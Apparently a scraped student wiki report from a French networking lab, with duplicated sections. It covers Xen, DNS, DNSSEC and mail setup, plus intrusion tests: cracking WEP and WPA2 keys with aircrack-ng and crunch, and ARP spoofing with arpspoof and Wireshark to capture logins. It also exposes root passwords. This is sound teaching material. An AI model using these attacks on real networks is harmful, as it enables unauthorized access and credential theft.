Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

Fichier:SSL Certification Gandi Mirage.png

2020-11-20T08:53:58Z

Aglaine :

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:51:56Z

Aglaine : /* renvoie du mail Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
